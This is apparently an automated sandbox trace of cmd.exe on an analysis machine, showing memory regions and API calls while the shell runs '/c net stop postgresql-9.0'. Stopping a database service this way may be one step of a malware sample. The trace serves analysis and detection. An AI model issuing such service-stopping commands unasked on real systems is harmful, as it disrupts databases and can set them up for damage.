"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6542 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6543 start_va = 0xe40000 end_va = 0x4e3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e40000" filename = "" Region: id = 6544 start_va = 0x4e40000 end_va = 0x4e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e40000" filename = "" Region: id = 6545 start_va = 0x4e60000 end_va = 0x4e60fff entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 6546 start_va = 0x4e70000 end_va = 0x4e83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e70000" filename = "" Region: id = 6547 start_va = 0x4e90000 end_va = 0x4ecffff entry_point = 0x0 region_type = private name = "private_0x0000000004e90000" filename = "" Region: id = 6548 start_va = 0x4ed0000 end_va = 0x4fcffff entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 6549 start_va = 0x4fd0000 end_va = 0x4fd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fd0000" filename = "" Region: id = 6550 start_va = 0x4fe0000 end_va = 0x4fe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fe0000" filename = "" Region: id = 6551 start_va = 0x4ff0000 end_va = 0x4ff1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ff0000" filename = "" Region: id = 6552 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6553 start_va = 0x7e960000 end_va = 0x7e982fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e960000" filename = "" Region: id = 6554 start_va = 0x7e984000 end_va = 0x7e984fff entry_point = 0x0 region_type = private name = "private_0x000000007e984000" filename = "" Region: id = 6555 start_va = 0x7e985000 end_va = 0x7e985fff entry_point = 0x0 region_type = private name = "private_0x000000007e985000" filename = "" Region: id = 6556 start_va = 0x7e98d000 end_va = 0x7e98ffff entry_point = 0x0 region_type = private name = "private_0x000000007e98d000" filename = "" Region: id = 6557 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6558 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6559 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6560 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6561 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6562 start_va = 0x51c0000 end_va = 0x51cffff entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 6563 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6564 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6565 start_va = 0x52a0000 end_va = 0x539ffff entry_point = 0x0 region_type = private name = "private_0x00000000052a0000" filename = "" Region: id = 6566 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6607 start_va = 0x4e40000 end_va = 0x4e4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e40000" filename = "" Region: id = 6608 start_va = 0x5000000 end_va = 0x50bdfff entry_point = 0x5000000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6609 start_va = 0x50c0000 end_va = 0x50fffff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 6610 start_va = 0x53a0000 end_va = 0x549ffff entry_point = 0x0 region_type = private name = "private_0x00000000053a0000" filename = "" Region: id = 6611 start_va = 0x5690000 end_va = 0x569ffff entry_point = 0x0 region_type = private name = "private_0x0000000005690000" filename = "" Region: id = 6612 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6613 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6614 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6615 start_va = 0x7e860000 end_va = 0x7e95ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e860000" filename = "" Region: id = 6616 start_va = 0x7e98a000 end_va = 0x7e98cfff entry_point = 0x0 region_type = private name = "private_0x000000007e98a000" filename = "" Region: id = 6617 start_va = 0x4e50000 end_va = 0x4e53fff entry_point = 0x0 region_type = private name = "private_0x0000000004e50000" filename = "" Region: id = 6618 start_va = 0x4e60000 end_va = 0x4e63fff entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 6619 start_va = 0x56a0000 end_va = 0x59d6fff entry_point = 0x56a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 416 os_tid = 0xebc [0128.966] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0128.966] __set_app_type (_Type=0x1) [0128.966] __p__fmode () returned 0x77ac4d6c [0128.966] __p__commode () returned 0x77ac5b1c [0128.967] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0128.967] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0128.967] GetCurrentThreadId () returned 0xebc [0128.967] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xebc) returned 0x84 [0128.967] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0128.967] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0128.967] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.970] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.970] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4fcfc6c | out: phkResult=0x4fcfc6c*=0x0) returned 0x2 [0128.970] VirtualQuery (in: lpAddress=0x4fcfc73, lpBuffer=0x4fcfc24, dwLength=0x1c | out: lpBuffer=0x4fcfc24*(BaseAddress=0x4fcf000, AllocationBase=0x4ed0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.970] VirtualQuery (in: lpAddress=0x4ed0000, lpBuffer=0x4fcfc24, dwLength=0x1c | out: lpBuffer=0x4fcfc24*(BaseAddress=0x4ed0000, AllocationBase=0x4ed0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0128.970] VirtualQuery (in: lpAddress=0x4ed1000, lpBuffer=0x4fcfc24, dwLength=0x1c | out: lpBuffer=0x4fcfc24*(BaseAddress=0x4ed1000, AllocationBase=0x4ed0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0128.970] VirtualQuery (in: lpAddress=0x4ed3000, lpBuffer=0x4fcfc24, dwLength=0x1c | out: lpBuffer=0x4fcfc24*(BaseAddress=0x4ed3000, AllocationBase=0x4ed0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.970] VirtualQuery (in: lpAddress=0x4fd0000, lpBuffer=0x4fcfc24, dwLength=0x1c | out: lpBuffer=0x4fcfc24*(BaseAddress=0x4fd0000, AllocationBase=0x4fd0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0128.970] GetConsoleOutputCP () returned 0x1b5 [0128.970] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0128.970] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0128.970] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.970] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0128.971] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.971] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0128.971] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.971] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0128.971] _get_osfhandle (_FileHandle=0) returned 0x38 [0128.971] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0128.971] _get_osfhandle (_FileHandle=0) returned 0x38 [0128.971] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0128.971] GetEnvironmentStringsW () returned 0x52a7d68* [0128.972] FreeEnvironmentStringsA (penv="A") returned 1 [0128.972] GetEnvironmentStringsW () returned 0x52a7d68* [0128.972] FreeEnvironmentStringsA (penv="A") returned 1 [0128.972] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4fcebd0 | out: phkResult=0x4fcebd0*=0x94) returned 0x0 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x0, lpData=0x4fcebdc*=0x18, lpcbData=0x4fcebd8*=0x1000) returned 0x2 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x4, lpData=0x4fcebdc*=0x1, lpcbData=0x4fcebd8*=0x4) returned 0x0 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x0, lpData=0x4fcebdc*=0x1, lpcbData=0x4fcebd8*=0x1000) returned 0x2 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x4, lpData=0x4fcebdc*=0x0, lpcbData=0x4fcebd8*=0x4) returned 0x0 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x4, lpData=0x4fcebdc*=0x40, lpcbData=0x4fcebd8*=0x4) returned 0x0 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x4, lpData=0x4fcebdc*=0x40, lpcbData=0x4fcebd8*=0x4) returned 0x0 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x0, lpData=0x4fcebdc*=0x40, lpcbData=0x4fcebd8*=0x1000) returned 0x2 [0128.972] RegCloseKey (hKey=0x94) returned 0x0 [0128.972] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4fcebd0 | out: phkResult=0x4fcebd0*=0x94) returned 0x0 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x0, lpData=0x4fcebdc*=0x40, lpcbData=0x4fcebd8*=0x1000) returned 0x2 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x4, lpData=0x4fcebdc*=0x1, lpcbData=0x4fcebd8*=0x4) returned 0x0 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x0, lpData=0x4fcebdc*=0x1, lpcbData=0x4fcebd8*=0x1000) returned 0x2 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x4, lpData=0x4fcebdc*=0x0, lpcbData=0x4fcebd8*=0x4) returned 0x0 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x4, lpData=0x4fcebdc*=0x9, lpcbData=0x4fcebd8*=0x4) returned 0x0 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x4, lpData=0x4fcebdc*=0x9, lpcbData=0x4fcebd8*=0x4) returned 0x0 [0128.972] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4fcebd4, lpData=0x4fcebdc, lpcbData=0x4fcebd8*=0x1000 | out: lpType=0x4fcebd4*=0x0, lpData=0x4fcebdc*=0x9, lpcbData=0x4fcebd8*=0x1000) returned 0x2 [0128.972] RegCloseKey (hKey=0x94) returned 0x0 [0128.972] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29831 [0128.972] srand (_Seed=0x5ad29831) [0128.972] GetCommandLineW () returned="/c net stop postgresql-9.0" [0128.972] GetCommandLineW () returned="/c net stop postgresql-9.0" [0128.972] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0128.972] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x52a9cc0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0128.973] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0128.973] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.973] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.973] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0128.973] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0128.973] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0128.973] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0128.973] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0128.973] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0128.973] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0128.973] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0128.973] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0128.973] GetEnvironmentStringsW () returned 0x52a7d68* [0128.973] FreeEnvironmentStringsA (penv="A") returned 1 [0128.973] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.973] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.973] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0128.973] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0128.973] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0128.973] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0128.973] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0128.973] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0128.973] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0128.973] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0128.973] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4fcf9a8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0128.973] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4fcf9a8, lpFilePart=0x4fcf9a0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4fcf9a0*="Desktop") returned 0x1d [0128.973] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0128.974] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4fcf728 | out: lpFindFileData=0x4fcf728) returned 0x52a05c8 [0128.974] FindClose (in: hFindFile=0x52a05c8 | out: hFindFile=0x52a05c8) returned 1 [0128.974] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4fcf728 | out: lpFindFileData=0x4fcf728) returned 0x52a05c8 [0128.974] FindClose (in: hFindFile=0x52a05c8 | out: hFindFile=0x52a05c8) returned 1 [0128.974] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0128.974] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4fcf728 | out: lpFindFileData=0x4fcf728) returned 0x52a05c8 [0128.974] FindClose (in: hFindFile=0x52a05c8 | out: hFindFile=0x52a05c8) returned 1 [0128.974] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0128.974] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0128.974] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0128.974] GetEnvironmentStringsW () returned 0x52a7d68* [0128.974] FreeEnvironmentStringsA (penv="=") returned 1 [0128.974] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0128.975] GetConsoleOutputCP () returned 0x1b5 [0128.975] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0128.975] GetUserDefaultLCID () returned 0x409 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4fcfad8, cchData=128 | out: lpLCData="0") returned 2 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4fcfad8, cchData=128 | out: lpLCData="0") returned 2 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4fcfad8, cchData=128 | out: lpLCData="1") returned 2 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0128.975] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0128.975] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0128.976] GetConsoleTitleW (in: lpConsoleTitle=0x52aa9e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.976] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0128.976] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0128.976] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0128.976] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0128.977] _wcsicmp (_String1="net", _String2=")") returned 69 [0128.977] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0128.977] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0128.977] _wcsicmp (_String1="IF", _String2="net") returned -5 [0128.977] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0128.977] _wcsicmp (_String1="REM", _String2="net") returned 4 [0128.977] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0128.978] GetConsoleTitleW (in: lpConsoleTitle=0x4fcf7c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.978] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0128.978] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0128.978] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0128.978] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0128.978] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0128.978] _wcsicmp (_String1="net", _String2="CD") returned 11 [0128.978] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0128.978] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0128.978] _wcsicmp (_String1="net", _String2="REN") returned -4 [0128.978] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0128.978] _wcsicmp (_String1="net", _String2="SET") returned -5 [0128.978] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0128.978] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0128.978] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0128.978] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0128.978] _wcsicmp (_String1="net", _String2="MD") returned 1 [0128.978] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0128.978] _wcsicmp (_String1="net", _String2="RD") returned -4 [0128.978] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0128.978] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0128.978] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0128.978] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0128.978] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0128.978] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0128.978] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0128.978] _wcsicmp (_String1="net", _String2="VER") returned -8 [0128.978] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0128.978] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0128.978] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0128.978] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0128.978] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0128.978] _wcsicmp (_String1="net", _String2="START") returned -5 [0128.978] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0128.979] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0128.979] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0128.979] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0128.979] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0128.979] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0128.979] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0128.979] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0128.979] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0128.979] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0128.979] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0128.979] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0128.979] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0128.979] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0128.979] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0128.979] _wcsicmp (_String1="net", _String2="CD") returned 11 [0128.979] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0128.979] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0128.979] _wcsicmp (_String1="net", _String2="REN") returned -4 [0128.979] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0128.979] _wcsicmp (_String1="net", _String2="SET") returned -5 [0128.979] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0128.979] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0128.979] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0128.979] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0128.979] _wcsicmp (_String1="net", _String2="MD") returned 1 [0128.979] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0128.979] _wcsicmp (_String1="net", _String2="RD") returned -4 [0128.979] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0128.979] 